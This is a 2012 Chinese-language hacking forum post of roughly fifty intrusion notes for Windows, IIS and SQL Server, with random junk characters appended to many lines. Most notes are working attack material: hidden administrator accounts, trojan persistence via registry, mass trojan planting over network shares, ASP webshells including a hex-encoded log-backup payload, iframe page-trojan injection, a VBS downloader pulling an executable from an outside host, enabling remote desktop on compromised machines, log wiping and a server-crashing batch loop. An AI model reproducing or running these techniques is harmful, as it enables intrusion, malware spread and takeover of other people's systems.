找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2260|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
" F$ |8 G: j7 D6 [cacls C:\windows\system32 /G hqw20:R  }$ I  s  R7 A
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入! U( f* X# u5 o* H% C
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
) z8 G0 f, G' p# a: w; f
% F7 c! O" X! t2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
& i- `" u2 ^9 F' z! {
0 @1 l0 e, I: Z9 Y. i) J2 y3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
  m, j8 ^' t  V4 D" J% v
8 T/ q' [" l# a4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号2 y. J1 o+ p' [2 Y( W5 Z& v
: P! t  z6 I% H# G) v  j
5、利用INF文件来修改注册表1 H8 K4 m% L6 ^; H8 N+ I' T
[Version]
  c6 O! F+ @* j, @: E, t- |) vSignature="$CHICAGO$"* k5 x. M0 j. N0 z# @8 i
[Defaultinstall]/ b, W8 _9 f# B( x2 }# h% p
addREG=Ating& g/ n9 T' i3 v  A0 _4 b8 K6 `
[Ating]0 I' _( G6 Y/ C0 T. Z; \
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. W+ s( o5 @& C% W2 {) E/ t以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:; |' d0 \1 m  l9 {& N, y* ~
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径! @& N4 m4 M* P3 {
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU3 K' s: N) t& r2 u- Y7 C$ \5 b
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
+ w+ m. D$ A& h; O$ YHKEY_CURRENT_CONFIG 简写为 HKCC$ a. F& p# h" S3 ]- Z- y) h
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值5 B  D6 T* H" \5 i3 H$ n% g* W
"1"这里代表是写入或删除注册表键值中的具体数据
% r# X/ z! a3 Z8 G! Y, g8 e/ G! H
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,2 @6 `# b& O, p3 I/ i: s" I
多了一步就是在防火墙里添加个端口,然后导出其键值1 C" R1 m& F; ]: M: J8 _) r3 {+ m
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
6 J8 V, E, ^. s# I# |* l
6 {0 F: \5 }  |1 ~4 n7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽# r* J" z3 j8 [: h. G7 ]+ r
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。! D( C6 c* F( C0 s0 M. {3 Z

: U* B1 H) o$ d2 s# _2 J; X8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
4 j: G  Q( V) N' c# p" c- i
! R" T: N4 Z9 S' x9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
. p2 g/ e' e" N& k# W/ F8 ]1 B可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
" @2 D3 k! v, ]+ a% l& V
3 n2 h. i/ z# q  s0 E$ A10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
9 `6 p- R( a1 K, G, e! [
+ y( @: x: w8 g7 {* V+ P( q11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% g7 j. G: c* t$ H) T用法:xsniff –pass –hide –log pass.txt: e2 R  s2 J0 q  q% T7 `1 j7 @

( Z! }+ z8 q# c: A12、google搜索的艺术
" E* ]; k8 e+ s- H" a6 p; f搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
) M+ {2 }7 f! Y; a# Q4 ?7 A或“字符串的语法错误”可以找到很多sql注入漏洞。6 N; J2 y: m) ^3 C

; I( U9 [5 V, h4 Y  X/ q13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ R8 A2 ~- c* ~- W5 y$ K8 [& }8 i5 Z( ?$ J- g+ A
14、cmd中输入 nc –vv –l –p 1987# T2 l- F0 B1 d9 U; Y/ v" i
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
# p2 E0 L! k. r% @7 {  Z
, ]0 q* ~  x, ^' `15、制作T++木马,先写个ating.hta文件,内容为/ u3 J3 y4 F1 L/ y! f- U
<script language="VBScript">
2 ?% _0 _! h* ?! D# Eset wshshell=createobject ("wscript.shell" )
/ b) L$ I+ c/ E9 t' G: Ca=wshshell.run("你马的名称",1)( s! k% }6 U* ?$ Z7 h0 W) z0 y
window.close% _; R! h7 A& x; u# E3 F& l
</script>$ ^! ~  y7 [6 j6 U. n/ H
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。! n. E4 N- {9 x0 b3 @1 p% e- E: z: T
/ H0 t6 B; M5 l/ b( R' ?4 y9 ?' V6 ~' g
16、搜索栏里输入/ T7 S0 x( F; n! v- k
关键字%'and 1=1 and '%'='
# K! g# C5 B: |: {关键字%'and 1=2 and '%'='& |/ G  B+ ?  T
比较不同处 可以作为注入的特征字符/ i7 u! e8 X, i
) P. ~3 s% s* |6 h
17、挂马代码<html>& O8 B* O( z% ^$ s
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# d0 Q. L1 J9 ]" A- _: S</html>
: @; ]# h3 V7 H% }. G/ o9 n$ p0 b8 W$ W5 M( U0 ^( W$ ^# a0 g+ j* Y2 c
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! L/ g0 _1 E7 _  Unet localgroup administrators还是可以看出Guest是管理员来。
3 R: M  |) b) I2 z; }) A% Q
* z5 [  z( Y1 D( H3 z0 l) t19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等: l: f8 C8 H2 B+ ^, Z/ }
用法: 安装: instsrv.exe 服务名称 路径5 L+ g7 B& J* v6 N
卸载: instsrv.exe 服务名称 REMOVE  A% V1 T% P' v0 M: K$ Y
# D7 d7 v; y' c2 Z$ ?% L

# p/ H; _4 e; I1 b3 ?: b1 R  j21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉" E: G- O7 ]' I4 j- `
不能注入时要第一时间想到%5c暴库。+ a+ F& L7 t$ B
2 T6 n/ K  a7 `6 `" K, j
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
, V. a7 |# \! G3 u' j& X& g) \9 k; b4 P6 y# u7 \/ ]+ |3 S
23、缺少xp_cmdshell时4 s1 W8 y2 h5 y8 Y. ]$ |0 z0 Z
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( f% x, L$ o/ t8 {7 L
假如恢复不成功,可以尝试直接加用户(针对开3389的)' r9 W! S/ z& L. ~+ d, g
declare @o int4 D3 s* q( R8 k) r
exec sp_oacreate 'wscript.shell',@o out/ L2 z+ M8 k8 c- U* D1 F! e! W, I
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' J) C9 }5 ?  o  Q9 o# g: n% `: b
24.批量种植木马.bat
/ E4 [' Q# N' ~6 ffor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
# w1 y# O! E( c2 S8 A$ }for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 T4 \- s5 E, A1 Q; O
扫描地址.txt里每个主机名一行 用\\开头
' k8 m# B1 h6 y  H$ A9 e5 t1 [8 w8 Z8 _$ T% w
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
0 T) m1 ?. {1 L9 d1 u- s" B/ g1 O  Q1 ]
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
  G, u" q$ ^  ?, ]% M$ k将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.$ a! ^1 [6 a, q, x
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马5 w0 ]6 S" k  O! l1 R9 T
% H4 o* @& w4 D* r$ Q  ]# D
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
, Z5 s4 R/ N( C' F, ^" w然后用#clear logg和#clear line vty *删除日志6 i) \0 D) ~9 ~/ `

; t; X& q% \5 @7 {( _: c28、电脑坏了省去重新安装系统的方法" T+ V$ \" K$ E: f, Z5 R& F
纯dos下执行,
/ z  a' P; I: J9 m& A, A4 A9 b: xxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" [0 Y- j8 V2 Q/ g( L0 Z# b( W2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
+ s* u& |5 {) y: N% D- N, f  s; \0 u
6 G. j, i! f7 ]0 @) a8 e29、解决TCP/IP筛选 在注册表里有三处,分别是:
, U% {5 J' c3 _3 X5 NHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip5 U* }. R9 v) }% i5 A0 c* G+ E# \) f
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 o% y9 ~1 ~  Y% T
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 z- ^3 @6 x) x0 L! F! B- ~- K
分别用
3 F" l- @& u7 q2 l1 Zregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: D' s5 J3 J2 _1 T* @( |
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 q( f+ v/ O/ Q3 e3 _+ u
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 n& M/ t, [/ n% G- ~- f5 u9 h7 \命令来导出注册表项
6 @$ K# Y9 Q7 e然后把三个文件里的EnableSecurityFilters"=dword:00000001,- w1 @- _" k7 i0 P
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用! i/ v2 e1 r" G4 \3 ^8 w- [
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
4 h/ r1 ]) ~$ b* g+ E/ T- h6 b" @- F7 J5 V
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
  |0 s! g( }/ C. `SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: W, c8 K7 B0 T7 u3 Z7 t- s  Q& j7 ~, `& U6 l7 r9 D' w( b
31、全手工打造开3389工具
. {, M9 R/ k& x- \5 _打开记事本,编辑内容如下:( P2 j& n9 M: s% m9 p
echo [Components] > c:\sql/ d3 y9 L% q3 z; f# Y' Y
echo TSEnable = on >> c:\sql
+ C5 ?( w  Y0 \: l/ y0 k4 O0 ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q! {  E- q4 V- c7 B* O$ j
编辑好后存为BAT文件,上传至肉鸡,执行
+ y7 K. z. u6 e. Q: q1 }' n/ B3 `9 Q) r( Z( t
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马. i2 s# g# Q7 P3 \1 [
6 C8 c1 K$ m: e2 Q9 p7 u' q
33、让服务器重启* D* S7 j; H' h/ f
写个bat死循环:- k3 m) r$ `1 A- K) t4 s6 h* A  D+ _. b
@echo off
4 m- B2 f: E7 Y5 e8 J- U:loop1
/ P% @1 k( g! z, B( v* b) c4 Pcls$ }0 q( @1 r" S0 V
start cmd.exe
7 T, p" ]: E+ J9 K9 K0 u% q, kgoto loop1& @) c) Q8 W/ R+ a; z3 }
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
1 d1 T% w/ `6 ]% q6 Z6 W
6 A, u5 l/ _/ T) c* t8 T" S% G34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,: k6 y# H1 f" S) @* g
@echo off
6 X0 a4 U( K7 l8 ]0 W# Bdate /t >c:/3389.txt
4 r6 I  t2 w8 z) }; D5 B5 o* Atime /t >>c:/3389.txt/ n3 B1 h/ S6 t: x' @" B0 q. [
attrib +s +h c:/3389.bat
0 p2 q" R: b1 S- H$ \; Zattrib +s +h c:/3389.txt, Y5 v$ I  b: Z# K6 T7 b& i' o
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt6 [* {/ w4 Z& f2 s
并保存为3389.bat
; E1 a8 p- J% ]" f打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
& i' S8 o& L! x+ S, W1 L$ L; x/ q1 f
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: P3 C$ L0 x9 S9 L2 _+ Ustart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
* c' ^9 O; D7 J# s3 q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
8 i& v# l2 S' l- I# k' Q+ R$ ~* v) ]* Y
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件. I; x2 }! |! P% u. A& s" f" Z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址) S& @" @- w. d
echo 你的FTP账号 >>c:\1.bat //输入账号
* Y8 d# p  C& V7 pecho 你的FTP密码 >>c:\1.bat //输入密码3 K2 u  R+ ~% m
echo bin >>c:\1.bat //登入
) T% q1 h, d+ ~5 y) fecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ f$ r) w, [, L) X2 k
echo bye >>c:\1.bat //退出
' q2 F, j8 ^% N然后执行ftp -s:c:\1.bat即可* ~$ `% }" t/ d7 z- ^/ q% _
8 F& }( u, {+ y' N# o7 H7 _
37、修改注册表开3389两法5 a& g! i6 o( Q6 I& ^, d. p
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表: x$ Z, f1 {" D) u  j8 B
echo Windows Registry Editor Version 5.00 >>3389.reg
) Y; K6 N) A: V7 w9 i) \# Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg; q' M! k. G+ `+ }0 R1 m% m
echo "Enabled"="0" >>3389.reg
  t4 T9 R1 Q) _& Z7 f1 T6 ]4 Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
# U5 [% s" H- @; P+ O9 v7 b" ]NT\CurrentVersion\Winlogon] >>3389.reg
9 w+ R- Z" u, T$ |echo "ShutdownWithoutLogon"="0" >>3389.reg5 ^7 ]2 u) t$ N( |6 j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
8 J; S& t$ T" N5 k>>3389.reg
5 P2 s0 p  M' Z+ m4 Decho "EnableAdminTSRemote"=dword:00000001 >>3389.reg% U9 }3 S4 O( Q6 V3 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
  _, p) O. o/ M$ l1 T>>3389.reg2 H# L3 i8 Q3 h: X
echo "TSEnabled"=dword:00000001 >>3389.reg0 x. W* S$ `% g, l% Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' G7 U- D; G; W# Y+ E% J
echo "Start"=dword:00000002 >>3389.reg* B, [+ N3 @. L. H1 K% L3 ^6 w# M4 v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
6 u+ |& |# T- p: O5 m; d- X; T! i>>3389.reg0 Z8 \! p4 h* e4 k4 r) Q2 }
echo "Start"=dword:00000002 >>3389.reg) K. `) z* Z( D% F/ ^6 @
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg+ O5 P2 v- p4 u9 a: q# `6 X/ I1 o
echo "Hotkey"="1" >>3389.reg
) |9 ^' ~1 n4 Q2 D( o# Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) v$ P/ S0 g& E. z
Server\Wds\rdpwd\Tds\tcp] >>3389.reg8 w) s. R* t: d& P' Z
echo "PortNumber"=dword:00000D3D >>3389.reg7 E/ l/ X( V# }. f) n  [1 [; C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ x' }3 d+ i  x4 H$ }. OServer\WinStations\RDP-Tcp] >>3389.reg0 K3 f$ Q/ f9 u4 o
echo "PortNumber"=dword:00000D3D >>3389.reg
- c' N9 d, O5 n/ e把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。9 l7 r5 P, k1 M, @! H- J; w2 S2 P' E
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)2 [! F( W" y/ M
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ N- D) N7 ~$ V. }$ D(2)winxp和win2003终端开启
1 k4 ]% o2 K( x2 ]% G用以下ECHO代码写一个REG文件:- P3 M3 ^. T9 q+ [8 \6 f& m
echo Windows Registry Editor Version 5.00>>3389.reg
5 F' ~& b. h8 d1 V* Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 X" j/ M3 @. r, I0 s
Server]>>3389.reg
9 }: j0 M6 `- n6 Lecho "fDenyTSConnections"=dword:00000000>>3389.reg' @0 |! ~) L* v) b8 b; m1 D/ p! q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, e+ \8 I% D% l& W  W( N3 k
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
7 {, S3 R1 F% G: z# a  Oecho "PortNumber"=dword:00000d3d>>3389.reg2 g! Q2 I# |7 _% {' a( l" F4 F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( J- t$ r9 [: j8 u" D7 q
Server\WinStations\RDP-Tcp]>>3389.reg
5 w& A/ u# M3 b, h( {echo "PortNumber"=dword:00000d3d>>3389.reg& `* K' z# e$ n% _5 B
然后regedit /s 3389.reg del 3389.reg; R0 Y/ h' A; D* L6 m  {+ C
XP下不论开终端还是改终端端口都不需重启; U* l) \) U8 Z  r) a

; j* G$ n' a( a# i* U1 e38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃- U/ T$ W1 k( V- |, E/ x
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'! W4 |" U4 J% a4 W
2 N8 C* [9 g6 M; Q& G" c
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
' e+ Z$ Y0 M' M" @7 M(1)数据库文件名应复杂并要有特殊字符
& h  N4 {2 l" y7 t1 V(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
) C3 d8 w5 N# Z0 |: r% @2 U5 O5 X5 q5 q" ~将conn.asp文档中的' v2 V6 L. ^( F5 j! h  u
DBPath = Server.MapPath("数据库.mdb")
2 n7 B/ i" C, c1 F4 i+ Jconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath4 |' h+ ?% m& o) o9 ^

' i/ d9 s8 C' `. `修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置# W2 F) s7 _% X% i  D
(3)不放在WEB目录里3 `4 s4 t. H/ i1 \6 D
) s# T& T1 |% `! j+ h4 o+ W
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉. h" ~6 ~' t: c  u1 G+ D/ R
可以写两个bat文件. a9 e% z1 H" K9 A# z
@echo off
- h" `1 S2 _* c% W$ h@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe- V) F; a# W9 T/ n1 _2 O& g
@del c:\winnt\system32\query.exe
. F4 I/ M6 L2 S1 E) q2 a9 r@del %SYSTEMROOT%\system32\dllcache\query.exe) S7 V+ m9 z- B0 V6 R. g0 x% }
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
0 b& Y% n2 o: ]: \% o; @/ [1 x0 a3 Q, t7 |+ k
@echo off
6 B0 S$ T* t" \2 P' d@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- m, X8 M+ c& R2 H& K! I6 r/ e; I
@del c:\winnt\system32\tsadmin.exe
# K/ |0 m/ B9 d" r9 E@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex4 p" Y# l9 r( U8 K

3 w1 y( t2 N2 E. d41、映射对方盘符7 u! M4 v3 C% B9 S$ J, K' [
telnet到他的机器上,- M3 C( [7 S2 w' z+ J
net share 查看有没有默认共享 如果没有,那么就接着运行
6 [4 ], K* s' G& b5 J  Lnet share c$=c:6 G3 Z" v9 {8 k
net share现在有c$
5 T8 a( w  X# s在自己的机器上运行
; Y9 N- V4 v/ L  z. W4 tnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K4 K8 t! U1 b/ F8 f5 ?
0 ~! a4 R4 X) U, i# W
42、一些很有用的老知识) m' E8 B7 U8 U* J2 _) F$ I
type c:\boot.ini ( 查看系统版本 )
4 d7 _; D/ r) e0 z* W* K, \net start (查看已经启动的服务)1 D* |( A/ ^1 \8 ?5 \- M6 ]
query user ( 查看当前终端连接 )
4 V$ N$ q7 U3 G! z# O( B+ Q8 }" _net user ( 查看当前用户 )
3 L. G, M' c5 _8 q3 m4 ]net user 用户 密码/add ( 建立账号 )
1 i) R9 v, w- P$ h& {net localgroup administrators 用户 /add (提升某用户为管理员)
  ]* A# l3 t) D% K: I3 a6 A4 Wipconfig -all ( 查看IP什么的 )
+ I2 M! o3 `5 onetstat -an ( 查看当前网络状态 )" j- V9 T. z# H2 U! V  c3 b
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)( o8 `! C2 t9 I# C% E( ]
克隆时Administrator对应1F4
) m' j! j4 N( _guest对应1F59 H) P/ g& ^( C: Q+ }6 f
tsinternetuser对应3E87 Z, F& {9 G6 a9 c, q) ~
# `- X3 A2 c8 K. W9 Q8 l
43、如果对方没开3389,但是装了Remote Administrator Service
# V4 ?) a2 d; Z7 {1 T7 v. y/ a用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接8 q, o3 ?* E* h" t' _: |8 C
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ z5 n6 r) x; {8 ^
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 G# h) z) p" e# J! }! }9 v# n, O2 Y$ v3 t% i. \& @+ Y
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" F- t! t2 f' z6 L, \
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)) _! I" B  K7 S1 W
* V4 t' ^2 ]9 S$ U: x) R+ c4 `* w- H
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)( w; {; k3 K  t: q+ F0 X
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
; M. M7 \% T" ^/ L- e. }, A^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =; p' q9 ~8 O6 K6 F8 s+ y; E0 \5 G+ e
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
' o% S. r  b' T$ ^( M; A6 y1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs- Z& s$ d" f9 ?* P3 M" x/ |1 d
(这是完整的一句话,其中没有换行符)
6 ^, i' M0 H2 h3 ]) G然后下载:' J4 ~3 ?: k- I9 H
cscript down.vbs http://www.hack520.org/hack.exe hack.exe1 D4 G; C/ o* p! b! {8 H) k

+ t5 I1 l2 O2 w  M& N0 d46、一句话木马成功依赖于两个条件:
% c* e  q9 `. K; W: b) \1、服务端没有禁止adodb.Stream或FSO组件/ x2 {; {0 n8 V5 W/ c2 h' q
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
' M# ]; G' A/ h! S/ y, k+ E/ h5 c% X- [
47、利用DB_OWNER权限进行手工备份一句话木马的代码:; s& ]; c5 T5 c  K" f1 b- S
;alter database utsz set RECOVERY FULL--/ |* i/ G: M: ?  _4 a- b
;create table cmd (a image)--
6 P$ A5 s; A  g0 X;backup log utsz to disk = 'D:\cmd' with init--* b5 R+ @6 w+ P9 ]3 b: P
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--$ r3 F* @# v0 q; p0 t9 t, H, F# S
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
% _' w1 j8 o4 o8 ?7 o注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 S0 X' b* T% y) G

9 {7 f$ E8 f# [. a- T7 o- @48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" ^' b7 Q! ]- x8 s! G4 v* K) B& q+ v% ^' ~$ r6 A( W7 m8 T+ c
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
' o4 `' i4 h5 @9 \3 e1 h0 a# m所有会话用 'all'。
8 n* W' ~  X& A! C, e-s sessionid 列出会话的信息。
: K. s. T/ M9 r, P8 ]-k sessionid 终止会话。( F  I; L' O' n$ Y8 g" |
-m sessionid 发送消息到会话。. q4 s% u# Y+ o# d. r

! ?7 b5 W0 p5 B" iconfig 配置 telnet 服务器参数。
/ O# f! x7 U( Z9 H3 |2 y/ N3 F/ x1 `
/ R. J& s& C* X1 n0 `5 lcommon_options 为:
1 z& v, i/ ?, D1 p2 }% t-u user 指定要使用其凭据的用户
+ M, R/ r8 ^( ^: M" m-p password 用户密码; v+ ]1 D4 @' g6 P3 w
! @# \1 G) \# h4 R1 E
config_options 为:
& H. \- g/ R; i6 F$ Q6 q9 D! I0 Bdom = domain 设定用户的默认域9 t+ _" I" {0 d6 B9 x' q
ctrlakeymap = yes|no 设定 ALT 键的映射0 ?8 p  J% X9 @2 D/ q. o- g+ ~
timeout = hh:mm:ss 设定空闲会话超时值! z' [8 v4 G0 a6 {* `) a2 y9 W
timeoutactive = yes|no 启用空闲会话。" M7 B" G- L8 l+ l! U; q
maxfail = attempts 设定断开前失败的登录企图数。
) ?" R) K$ X' l8 \maxconn = connections 设定最大连接数。4 w& R" T" ]1 G; N5 L; }* d
port = number 设定 telnet 端口。
5 E/ d3 n; B9 A. Y+ ~" w3 zsec = [+/-]NTLM [+/-]passwd
' J# b" Z6 I% x& {) b/ ?设定身份验证机构
: |6 N1 K/ l; r9 hfname = file 指定审计文件名。
: a  o5 i0 f# o; p- m7 rfsize = size 指定审计文件的最大尺寸(MB)。8 S5 o" N& h, f, M9 R
mode = console|stream 指定操作模式。
: B: E: W" N" Cauditlocation = eventlog|file|both
9 n+ p  o( H1 o. X指定记录地点% A+ _3 K$ S& I# \2 ~4 i$ I
audit = [+/-]user [+/-]fail [+/-]admin
% H0 A- ?# }/ a6 |$ s5 S: [1 {$ T. c
49、例如:在IE上访问:
  m  r. C, \" U1 U5 M9 Owww.hack520.org/hack.txt就会跳转到http://www.hack520.org/0 j3 K7 _- G1 j. R- Y
hack.txt里面的代码是:5 [' K; r+ m2 c0 u% u3 Q' y. T
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
. ~/ ]7 w" h/ l# N8 ^9 H7 t把这个hack.txt发到你空间就可以了!
1 S) Y) |9 Z( w; w这个可以利用来做网马哦!4 Y( n3 x6 o9 G, V+ B

+ S9 p3 q! f. g50、autorun的病毒可以通过手动限制!3 p+ I' f5 u5 h
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!9 o) a* n( j$ h6 z1 \. U* h0 U
2,打开盘符用右键打开!切忌双击盘符~
. I' b% M6 m5 W% n3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!3 y5 ]; U3 A) I% B' ]/ P
  Q  k# w9 m) J# C. f0 E
51、log备份时的一句话木马:6 E  U' Q4 Z, V) G& O
